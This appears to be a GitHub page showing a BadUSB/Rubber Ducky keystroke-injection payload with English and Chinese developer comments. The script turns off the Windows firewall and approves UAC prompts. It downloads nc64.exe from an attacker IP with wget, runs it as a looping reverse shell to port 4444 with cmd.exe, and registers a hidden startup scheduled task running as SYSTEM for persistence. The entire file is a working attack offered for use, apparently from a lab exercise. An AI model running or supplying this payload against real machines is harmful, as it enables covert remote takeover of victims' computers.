-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpayload.dd
121 lines (94 loc) · 2.86 KB
/
payload.dd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
REM ! over firewall
DELAY 200
GUI r
DELAY 2000
STRING powershell
CTRL SHIFT ENTER
DELAY 2000
ALT y
DELAY 2000
STRING netsh advfirewall set allprofiles state off
ENTER
DELAY 2000
STRING exit
ENTER
REM maybe the delay maybe not be the same
REM open cmd
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
REM use echo to use kali-wget(my ip)
REM STRING echo (wget 'http://10.122.235.199/nc64.exe' -OutFile a.exe) > b.ps1
REM yeah the ip need to change by the computer(use ifconfig in kali)
REM so yeah the previous is above
REM STRING echo (wget 'http://192.168.31.180/nc64.exe' -OutFile a.exe) > b.ps1
REM the grammer have some problem
REM 一定要注意改成kali现有的ip!(我多次忘了)
STRING echo (wget 'http://172.21.233.118/nc64.exe' -OutFile a.exe) > b.ps1
ENTER
DELAY 2000
REM 一定要注意改成kali现有的ip!(我多次忘了)
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 2000
STRING echo while($true){./a.exe 172.21.233.118 4444 -e cmd.exe -d} > c.ps1
ENTER
DELAY 2000
REM 以上,所有准备文件好了
REM 5.18 00:45 b是不能动的。。。我大意了,而且进程需要自己取消 我之前放上去过,需要手动删一下(如果ip变了都需要这样)
REM 接下来是设置开机自启(注意:这一份代码功能在重启应该是还没开始的)
DELAY 5000
REM 打开运行窗口
GUI r
DELAY 2000
REM 打开 PowerShell
STRING powershell
ENTER
DELAY 2000
REM 输入命令创建wrapper.ps1并写入内容
REM !注意 这有两处需要改成目标用户名
STRING $wrapperScriptPath = "C:\Users\halfa\wrapper.ps1"
ENTER
DELAY 2000
STRING $scriptContent = @"
ENTER
DELAY 2000
STRING $scriptPath = 'C:\Users\halfa\c.ps1'
ENTER
DELAY 2000
STRING $arguments = "-ExecutionPolicy Bypass -File `"$scriptPath`""
ENTER
DELAY 2000
STRING Start-Process "powershell.exe" -ArgumentList $arguments -WindowStyle Hidden
ENTER
DELAY 2000
STRING "@ | Out-File -FilePath $wrapperScriptPath -Encoding UTF8
ENTER
DELAY 2000
STRING Start-Process powershell -Verb runAs
ENTER
REM 下面这里必须delay 不然反应不过来报错
DELAY 2000
ALT y
DELAY 2000
REM 这里需要管理员权限(准确来说是最后一个)所以在上面写了给代码
REM 输入命令创建计划任务
STRING $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ExecutionPolicy Bypass -File `"$wrapperScriptPath`""
ENTER
DELAY 2000
STRING $trigger = New-ScheduledTaskTrigger -AtStartup
ENTER
DELAY 2000
STRING $principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
ENTER
DELAY 2000
REM 如果整失败了,可能需要把下面的名换一下
STRING Register-ScheduledTask -TaskName "RunScriptAtStartupWithWrapper3" -Action $action -Trigger $trigger -Principal $principal
DELAY 2000
ENTER
DELAY 500
REM 退出 PowerShell——不退了,方便我排查问题
REM STRING exit
REM ENTER